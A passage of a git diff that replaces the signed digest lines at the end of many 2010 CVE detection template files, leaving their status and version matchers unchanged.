490a0046304402206edac5876107d5f82bf5701673a37f3855b77a2c31a6b6e7a1da22af90f3766c02200cafb34ac24bd0d1367f64014bc6727b58a6f2468d783e4c6c81a064475b7390:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205d9a2c6672f9d816ad79f60077dad5db2214291d2d85986ecc41f8e4471c2d5a02210080f702ed8caeba502eb3c0d2399486ffff5595686f2cfd1c117d941b62f6548f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1602.yaml b/http/cves/2010/CVE-2010-1602.yaml index cd9a3e19e6..90db209d88 100644 --- a/http/cves/2010/CVE-2010-1602.yaml +++ b/http/cves/2010/CVE-2010-1602.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220290dd86db1faa992098c4b0f73c7654644b03eae53f450b35197edbf4e50fce4022100cbb7f50a7c405a13407ff912e856d09735e30d47ee3817ea21f93f440ee0b250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207366b0c511f318a0209b8fa22f55445f81ad085db6be704de2b174f97482d22f02206e3b219b62688c40ef41429b77e7a61cb15abfd61367d377aacd6beb3db96019:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1603.yaml b/http/cves/2010/CVE-2010-1603.yaml index 81250b053c..df54a156aa 100644 --- a/http/cves/2010/CVE-2010-1603.yaml +++ b/http/cves/2010/CVE-2010-1603.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402207aecc61f14dc32fb3d52d57a02f65e6ca7fe1248d479866cc2f270ad70d2e8350220192b03370d673feadc5f0f056dbe32af6752750a5b3a6189824b373ee9942481:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c14ee548f36b7058173ca28fa596965d11b2f50ee2f6aafdefa1a7c99411bc700221009270d73f7a2601892c0ca5ddb239e32899e07103b299577e1e6cff04945f10cd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1607.yaml b/http/cves/2010/CVE-2010-1607.yaml index 27184bb27e..0be18be78f 100644 --- a/http/cves/2010/CVE-2010-1607.yaml +++ b/http/cves/2010/CVE-2010-1607.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c37f564e45b1a095557537556e6fc5529db3861979d9f8cc7871bf45b972789602201f14d3c585153158d6d1513c809426cdc5bf4b8cd4e579b2528bad36d980eeaa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038c23f29f3d13ea4fe2281a8f93423bb129deca2ddadfdf268ad30b8d975644a0220610ad353bfe219e33a8576b8447ff36a6ad17b50d22e4dcba7b8151fb16fc32a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1653.yaml b/http/cves/2010/CVE-2010-1653.yaml index 421e42ed89..f78c6478b8 100644 --- a/http/cves/2010/CVE-2010-1653.yaml +++ b/http/cves/2010/CVE-2010-1653.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022029242a7077a7b45969c4a0a50616a234fa8121b3ec50fbccf8898c87125a79c202203b5db4964669217bd6cb0595d2e58027e8dc4e1cbf3ad44f9c3c75c38876fb01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402205cd36ccd7df328410cb1ca4ef302702f273e11d038712bd4a7c9dae31039a19602205c9dad695261290e1eb4050bbe256ff024d66c40107629235c132d7db63a1b92:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1657.yaml b/http/cves/2010/CVE-2010-1657.yaml index 09f7126d2c..93c4927413 100644 --- a/http/cves/2010/CVE-2010-1657.yaml +++ b/http/cves/2010/CVE-2010-1657.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402206b45fb3e22374f56b528d0224831a712aaa3d82734c27f64bbb830b3aae3e4270220045de48c4ef548d03f4c030408a96d3185aa9c4cc71155f433ec2297e75b8551:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100e4082889615a1b23f4ed967432f60614ab76291ed3faa33ea6e5bb9018b64dfb022036fb0352348d4e6e28bf66574d6eb51ff0932fd5689e72e99b3a2f89d89d315b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1658.yaml b/http/cves/2010/CVE-2010-1658.yaml index 90b416f391..bb81723d53 100644 --- a/http/cves/2010/CVE-2010-1658.yaml +++ b/http/cves/2010/CVE-2010-1658.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100a67780f4ffb8421b4913c9bb7356d2085f6d8010c2f57544b503e3267b1a5f2b02207f4253e96686e926c8d0c5570f0a1cd5935383902fbdde47cf9482ebe68a6ad7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bca0ac89fede9525b184d272b14b12506f54c4ebd6fb83ac3a6dfaff63d4ecf7022032c4a4e48ac35b30f0774371dc241e37289a5f3ba7bdad0086090d3850470915:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1659.yaml b/http/cves/2010/CVE-2010-1659.yaml index 412e46168a..7ef7f4c4a3 100644 --- a/http/cves/2010/CVE-2010-1659.yaml +++ b/http/cves/2010/CVE-2010-1659.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100eab4d7279b5c617e1dc60ed807028331e0a3a20f663fcaa96d5ecace5d023deb022046c25e560476c8b53806bea5ef61a2792625e87d30bf4cc411462aaaa51f70ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022001bd9f2440359a43ce4280cfcdb61b5d1be0a22b90ccfe3334e37e91003d17a502207e64e6636b7515f747303b46df32d7013f90a8355b70ba66effea9527f56769e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1714.yaml b/http/cves/2010/CVE-2010-1714.yaml index 2a68e9eed0..6b256ef453 100644 --- a/http/cves/2010/CVE-2010-1714.yaml +++ b/http/cves/2010/CVE-2010-1714.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502207919107e32657746847581db165f3b79a9b4f8f290bd78b9e7aae494ca91cf6e022100ec261aa9bffda43bd62356b558b9893eb195649dff56b7be6816d14d1ca8e734:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022033d8b75f069c17b8d44b4d66322cdaa8b11b9acb5b2c8ad667ddd5bfd9bfe37f022100839ed75119d280a2714baee81d0257924a420ffb9d4d1f6c62522b83557494cc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1715.yaml b/http/cves/2010/CVE-2010-1715.yaml index 7d28e8e2dd..79b053fc83 100644 --- a/http/cves/2010/CVE-2010-1715.yaml +++ b/http/cves/2010/CVE-2010-1715.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220399d6d4baa8d830ff6b7859443850d66233551501580775b34686d0664bf894002203579d5c6470db1612f34419148b404414e789d8801ce827581c2498b73822665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100de73eabc5a68a6bef4409b6412e40d6ea78e4e11555ffe37fd84f31a0a5dfe4b022054b2ffd4bc3aed388c0343f6ae1a6da758ca1572a96d1655ffa3e7661febcf5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1717.yaml b/http/cves/2010/CVE-2010-1717.yaml index 53605832af..ecff648963 100644 --- a/http/cves/2010/CVE-2010-1717.yaml +++ b/http/cves/2010/CVE-2010-1717.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022024c6cad07f9234d03bda1b47bcff7b62648b645d181fe28d2cfdf9cd1372e1be022100ca59cc8f108f456637034771d6dfe518d39d33e8539d607a963ba328f8acf6a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c7828edb4e6f1fd35432c8e11d1061becf14e4d3bcdae38f84cb9910c4ea5e9002200b6b779cf18d9fb12fdb72ddb3bcb778e62c4561defb66c2090a7a1e7282f512:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1718.yaml b/http/cves/2010/CVE-2010-1718.yaml index 976873bb25..8a97bfc44f 100644 --- a/http/cves/2010/CVE-2010-1718.yaml +++ b/http/cves/2010/CVE-2010-1718.yaml @@ -38,4 +38,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d77406872e943c321baaa71a476550971977484aca4fff8265f23e2954fe2b5c022069481ed387ee5756984862687401f6583dd24f4e191de65e8d1494db3c10fe3e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100e1c55cee7c6493701d06ab82bc2091c52187dba04f550298e38d81f2a1299733022100b338459018a8c6e2433c5681ed737a6600035a83f4bbdcc3c52ee43dda5ad5ad:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1719.yaml b/http/cves/2010/CVE-2010-1719.yaml index bbe13271fb..eec69b973c 100644 --- a/http/cves/2010/CVE-2010-1719.yaml +++ b/http/cves/2010/CVE-2010-1719.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220142f9dcdd56f429cd511e16b35108914b7eafc2b970541a565bf5a517e3c9e840220363d23a03fae02e91d4ef98823a6c443cb14d0a6d9efac30106888db03c09d13:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100856b733146145abd630ebb41fd542cff8a4ecfbf8eb7205f6327cbab8412d03f022045eda954ee30bc412e62318ed5e73919f3444a202f8d368c0e462a87a62e5ec5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1722.yaml b/http/cves/2010/CVE-2010-1722.yaml index 15dd472bd1..419e077301 100644 --- a/http/cves/2010/CVE-2010-1722.yaml +++ b/http/cves/2010/CVE-2010-1722.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204029fb965c07390c26ef14cd50c268e79b556490205f907ea2518cd51b310187022100fc6c41b9d87e8863813ab20b07ed17cab76497f2ff13b40f2bb722b76ee9224b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203f0d1de10ccaf9a9d9ed87e953e7cfe386fa078accae00d5db36ab20b676e4d20220323bb7687e98c78a52e9922aa6f83bb11e71e70f3896c302d1e67bc7b350fa86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1723.yaml b/http/cves/2010/CVE-2010-1723.yaml index d1d622d487..4ffef7e144 100644 --- a/http/cves/2010/CVE-2010-1723.yaml +++ b/http/cves/2010/CVE-2010-1723.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022025b9b98f4d35753e0c141616a32cc51ad3a7ba2109c5eadcffdf73c6be6d596b02210096818c1f3cb022812038e4df2cbeaee4a59c717b09ae154ceba6ec71683353be:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a0048304602210099dcb4cfc8f97ee3fa06452774e39526e6161b4d35d0dcb53c7628712ad41301022100fccd8f618d2605f19f9b74e42014aae21f60294a6a45eaee43a9291a0919de5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1858.yaml b/http/cves/2010/CVE-2010-1858.yaml index f3a141c8f0..df5a5d05ea 100644 --- a/http/cves/2010/CVE-2010-1858.yaml +++ b/http/cves/2010/CVE-2010-1858.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f608aef30150d5e5c232e9d8dcc6df9cdfd7e21f5ce65d95be6a773a89e08a7202206ba7e3cdef270c98019ad813be0f23b6d5fc484487c52d466c8d0f694ebb3050:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100937ae1adca55fa10b4e9dee9e6811368df5b4bdfdc3b5b20694062a084e340e102206be7c509145fe473749c5140e03e42ff09aabbfcacea12c8077303d0aa9bcbcb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1870.yaml b/http/cves/2010/CVE-2010-1870.yaml index e453442543..84fbf95a8b 100644 --- a/http/cves/2010/CVE-2010-1870.yaml +++ b/http/cves/2010/CVE-2010-1870.yaml @@ -42,4 +42,4 @@ http: - 'LISTSERV Maestro\s+[5678]' - 'Administration Hub 9\.0-[123456780]' - 'Administration Hub [5678]' -# digest: 4a0a0047304502200ef3e6075b857e768a6c73e6ab6b832333c026b5215f724a1c1326d408f7476702210080cedbaf8d0aa28a9ecf41eef8caa268141b32cd8ef87dbfd6c6bf9506c177e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206c476becb6734d99f6798012e82683e6f1881820d70f3f73860b57005d3dd0360220405a12d4a3f8492ce1daa1e583f1610f44c69a6747d4d6a11f03a6fee8e5d50b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1875.yaml b/http/cves/2010/CVE-2010-1875.yaml index e515ff2ce3..3fe6292eda 100644 --- a/http/cves/2010/CVE-2010-1875.yaml +++ b/http/cves/2010/CVE-2010-1875.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210096599b6938468d1724b9c666c12272f8761f1c49b7234c79b9da17d8069660b0022100ae9cad5a44599e30600a668bdaf45f2c7c5933125c8a51761948d9a0edac674f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205856fe9e73b1d5cca8c511bcc432dfbae4f1a813562b3e59ce4e59289baf5834022100be78360141876f897379ddd9b38e28ed1e3b4beb313bfcef78c87e7c90f67cf2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1878.yaml b/http/cves/2010/CVE-2010-1878.yaml index 61510a5d91..2cecdbc692 100644 --- a/http/cves/2010/CVE-2010-1878.yaml +++ b/http/cves/2010/CVE-2010-1878.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204fe41f3fd8697df9c9c614652c99e747d454f93efd44feb9db9d1713ff84bdd1022041601d6ab93517d57967de9b29c4d524a4020d711d1f56e102ea04795e6c2bd5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eb274383f4eb077f4203d11587a7a2562c94d59ac6e2a7463c452019f92e468102206bbd24acc4975e3ae6cbc63fca17f9f8befb45c7fc1a6b87ddbd778153c2913e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1952.yaml b/http/cves/2010/CVE-2010-1952.yaml index 668b7860bf..6e3434fc44 100644 --- a/http/cves/2010/CVE-2010-1952.yaml +++ b/http/cves/2010/CVE-2010-1952.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b77b1aa781afb8f30a0407d366a5c4b2a339748c0653b543fac57e537f06f0b90220374c1afe6bc15dfb4dbac3f006793b00b9507f2de2358b1d30c92c9b60a2865d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207d9d2424eebd59ae90addf133b079776c971c3f90e3003ab97f0607ffdc1e14f02200a26babe13ed145ed0c7f748a6763eb79d8fac3c2f12b802410b597a4f5c0f69:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1953.yaml b/http/cves/2010/CVE-2010-1953.yaml index 961082d3c5..b7b70f48e3 100644 --- a/http/cves/2010/CVE-2010-1953.yaml +++ b/http/cves/2010/CVE-2010-1953.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221009a8c827a37e9c486aa5fa22a7d5bb958527f763e3356b20a6a00bd7686088a3a02201160221b0ce54c42b9010b07dea23a4285638a613b99006da211d6d2461c513b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205e716d912c1e5e4126003c508dd1c44c45010d3539396ede753ebeaa5f954fce022100b0de3e2ec93f802335c2111ce1e80f8c65c24667183a1278ab56cc7a70081079:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1954.yaml b/http/cves/2010/CVE-2010-1954.yaml index 956b4aa108..3b9e3a1594 100644 --- a/http/cves/2010/CVE-2010-1954.yaml +++ b/http/cves/2010/CVE-2010-1954.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402201e5a7321b5302ff3caef9ca9d3d287fd805fcced4693f2763f69871d0cc2abf80220225d9803b900724032d3e0f8a83cf9c70a9a2b121fde2cb7d7c80ec2ed6ca5c6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bfce89678f2352614f02d2f65fbd2f1134c4c561f112f9d5bd3620dda558742502207d0f7de9f18b696499a54b7d0efabf9156cdfa2251df4312a877d9c8fa22bfdc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1955.yaml b/http/cves/2010/CVE-2010-1955.yaml index e679521888..0d8506ed1c 100644 --- a/http/cves/2010/CVE-2010-1955.yaml +++ b/http/cves/2010/CVE-2010-1955.yaml @@ -40,4 +40,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f4489f8b45d80704037cd3d084a66bed44d825de4f0b0e9976e13041a708d0eb022034251a6380f133fdee626900b4c3e35fe6f53cbb1a0e06226b9af9fa92d5be3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100fc8e9a2240282526342580278a00d39c3064dba87f18bb27a998e17b4425d87a0220544f6e512c5b1f70a4f77624223980d645e9ef6bedfea60362a53269de2fd763:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1956.yaml b/http/cves/2010/CVE-2010-1956.yaml index 66a9ec03df..83ce3228c8 100644 --- a/http/cves/2010/CVE-2010-1956.yaml +++ b/http/cves/2010/CVE-2010-1956.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100cd813160bc5df34b92a04ebe5bc25538644b05407f4557d7f1e3699eb2738477022100d6e64050632ee2df63a0646d3c279e06a4169ad9c47bc6234a6bd00febcfe022:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ab0dd46ef6cab57ef400ce48e65ba6d381043d890210023488ce038b1af30824022100c01eeca4f3306423b3b525afc2d86436661519a71f6e8d781717ba63c33a5843:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1957.yaml b/http/cves/2010/CVE-2010-1957.yaml index f1226ad515..c341df1a40 100644 --- a/http/cves/2010/CVE-2010-1957.yaml +++ b/http/cves/2010/CVE-2010-1957.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100f674e133070fef23bfc4ae1cd446c12b63e60dddd20fa2bbf3a6b386b663f9d002210090748da31b933be0ac8c56c26b1a0c81da8b037c7457ed3f7f9de00e6d1b1988:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100dfe88ca94970284507f376df4b32eda8a2a103e66d42cc72bdb4f1a0a592902902207891e2a42e8633f14d7c5f26c3cf0c46ccce261726a06f7e4351fd91820957a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1977.yaml b/http/cves/2010/CVE-2010-1977.yaml index b1d874c137..2fc7ed441b 100644 --- a/http/cves/2010/CVE-2010-1977.yaml +++ b/http/cves/2010/CVE-2010-1977.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f381c6bd2f0253efe1483cbd1ff74b59a37069dfa799e862e6c431de98e344c702202062a659f3bf9bf958e1a4aadbf67e07fb30d90d88140602aaa10158caac3347:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d34a2c3a7ba6e67fc12d7295f6a942bf6a873ebbe10354a30583035549df709102201f1f739f70014ea908a7760dd7db2cd0121b106ac070be68129a59cd9012900a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1979.yaml b/http/cves/2010/CVE-2010-1979.yaml index 9e79581b55..d9c6e7b9b1 100644 --- a/http/cves/2010/CVE-2010-1979.yaml +++ b/http/cves/2010/CVE-2010-1979.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204d0d7fb9b7ca49039651bba15cdae46e8d3c34eab245c063d2d85a86cd4edb6c022100eda90cae8a943ceabe34fc18d99c354c3c00473ad8b80d22f9c56f449c84633c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022026f393faa780642a7ef6a0d4dbba5c4c33bc2605ea8479b151a733dce82c4f9e022071d86c5ea7ceee09cdcb8c4cd17bf63591b9cddf6b7b6638e7e4fb88b9904aa5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1980.yaml b/http/cves/2010/CVE-2010-1980.yaml index 4566707873..3afd43d07d 100644 --- a/http/cves/2010/CVE-2010-1980.yaml +++ b/http/cves/2010/CVE-2010-1980.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220539f782a9c5542207d586e38c6b76362a601745fa4c623a93ed82ef86c0964bf022047be814d1d5bfbf20ec8397ab00a88cc61feafb3db3673b1a3ff16eafb58d261:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220302e94e566110c6e09c60b58168e5e0046ff670ae36a841f156c27f0c97aa229022100b5badd5fb4e529f36e102e9a11917cb4596a7aa1bc60af34ddaa7d4c26b8301c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1981.yaml b/http/cves/2010/CVE-2010-1981.yaml index d3016b53f9..56f8e700ee 100644 --- a/http/cves/2010/CVE-2010-1981.yaml +++ b/http/cves/2010/CVE-2010-1981.yaml @@ -43,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e8dd075c2ff4fcbe1ea6c7990fcc179393d96de943d6da50ee5d4bfb9709eca0022100fa05ee5d0e8996852dbd4c47e067becca1e6317d96ce5cf3a59f4967ea5e8dd0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100cf5a2c760e43ca8f15d8f1770c8da7be7fe3ecb73e838bb77e3df92be3072bef02203c1c97685a8eb88c4b4fa89cb4fb404656b052e43926cc1193fcd522f2e70ab7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1982.yaml b/http/cves/2010/CVE-2010-1982.yaml index c19ff1021e..d2d0b6956b 100644 --- a/http/cves/2010/CVE-2010-1982.yaml +++ b/http/cves/2010/CVE-2010-1982.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502201c4befc54c58c718425c23978d26d27f5186f121b1526e5ae8e8ba31b03609bb022100fd9f75d9caca461ff58f9e699377a521b225791878c5f76517151fcbf0967697:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b214043757a2a6bf411c95e2c53749082f1714641441240953a918bdc1b2dbe50220477d5b83b848e7f17d9a05832078641fe0fa33995d5d370aad45953ff14392d2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-1983.yaml b/http/cves/2010/CVE-2010-1983.yaml index aaf7d34010..4facbe31e6 100644 --- a/http/cves/2010/CVE-2010-1983.yaml +++ b/http/cves/2010/CVE-2010-1983.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206f21979aa6337361f235bf3e8a9d6dbe8f1d9649dcacfe9b1c1cc6c2bc821b56022100f6c096abff5b3c5258c2f2ef595d7277245e11e619fad038a3b45e02ffd10f27:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c9d2f78e23ba6bcad955ab2156a2974c248e4607a64eba46db9fbf3c166d868f022100c010f9d0bb46c738d855e6798e49c59389f0b82bc6537f85fc58a63ab903b797:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2033.yaml b/http/cves/2010/CVE-2010-2033.yaml index f4801b9dc3..93a0719d14 100644 --- a/http/cves/2010/CVE-2010-2033.yaml +++ b/http/cves/2010/CVE-2010-2033.yaml @@ -39,4 +39,4 @@ http: - type: status status: - 200 -# digest: 4b0a004830460221008b85c8dbd2c3d870feaa77152d698d27e68ba3e633388167d223ed2d52f5a4c8022100a81bd1c134ea547ab9327934e70f799d61760947e8c45b6772398819c583c8f1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c597ff7bf1862f7aab0b5732c670b6fcdbcdff269a02954215ae56849d16baa02205bdea3a6ae3e28bdb17775b90a6c104ffdcf13b12c6173d7b259045983a1d72d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2034.yaml b/http/cves/2010/CVE-2010-2034.yaml index 4fce86d698..e659d44347 100644 --- a/http/cves/2010/CVE-2010-2034.yaml +++ b/http/cves/2010/CVE-2010-2034.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100aa640c948119b286df93f9be8d64309532b2e40defe14624efb45252ffe48c63022100b9bebade79b7fd6623d04434246593e6f22a9dfe5df5ebf2b7932d6ebf35060d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100f561c2f3e4ee4fde42f3c5b471dff9111277dee6d1380280fa4f6e53558028ab022018cbed63e0eb4eaf4e7b5855d7b42d31622c57f18aef36478ad3946b6bdb62f5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2035.yaml b/http/cves/2010/CVE-2010-2035.yaml index 28827de4c5..d974924529 100644 --- a/http/cves/2010/CVE-2010-2035.yaml +++ b/http/cves/2010/CVE-2010-2035.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b34c29fe1f1c74fdfb477df382907e0e678ec8d0edef26b57955499820762075022056655cc35c216a2779bbcc446a466020f32a142cd247877a81d90150317332a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203f8fa54a88fda55e07cb6afb611145e7acd708d0984a451524990c20b2a83ae9022100c95f750d82089752d43bae8c8cda8eb8c3588bee65b5cace85995c3c81dc7748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2036.yaml b/http/cves/2010/CVE-2010-2036.yaml index 19a1780143..843163b516 100644 --- a/http/cves/2010/CVE-2010-2036.yaml +++ b/http/cves/2010/CVE-2010-2036.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022018b41597188ecdf7078080c36fb2f00046dcf374f659900b130a457b29f0c7a80220146c0933b38da8fa58556f877044de2d95444dc063a86de47bb213ce4cfe97ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a93f883ad1535bc83b9353f9595e55f20993789db2381d448f9f36e9620ada92022100a4d387d1e41d86e599163efa90fb2dfad350daf4852ac4492907d0d534f97559:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2037.yaml b/http/cves/2010/CVE-2010-2037.yaml index c5328ad5e4..ddf75731a9 100644 --- a/http/cves/2010/CVE-2010-2037.yaml +++ b/http/cves/2010/CVE-2010-2037.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c0dc47212898eb091df74236685b77998209ca78058c2dc670b09c01c9e4237a022054b30b0fda49971bf03c7fa66d263d93ce1612b83cd30200ca9fb66935f58441:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220713cea5890fe8309ea0b8c5dcdbf1de0bd89ce6f56c7e238b2eb4af7a26b0519022100e1bed6b3589615c3f320c0e07d11b8afc1e57e54cc16823f1145de0dac8e54b3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2045.yaml b/http/cves/2010/CVE-2010-2045.yaml index 2aa8d1306f..ea584c8c70 100644 --- a/http/cves/2010/CVE-2010-2045.yaml +++ b/http/cves/2010/CVE-2010-2045.yaml @@ -41,4 +41,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402202204d189f12836aab573b907af0c77342ed476c85174a34b4d425e0907216d50022070202d7e8c7655fa80ed2098d9461ff3ae92107234d4877f0cf675eaa5f5d2b1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ca00fa1c2e8785e665cbf491b2e108f921561c2dd2e87039ef156d77c44f40e5022100daf8e4b14c228b30e2c641a0c6af878823e71701c4282339b11d1f50b27f3795:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2010/CVE-2010-2050.yaml b/http/cves/2010/CVE-2010-2050.yaml index 8ca78ec368..adf1e91f18 100644 --- a/http/cves/2010/CVE-2010-2050.yaml +++ b/http/cves/2010/CVE-2010-2050.yaml @@ -42,4 +42,4 @@ http: 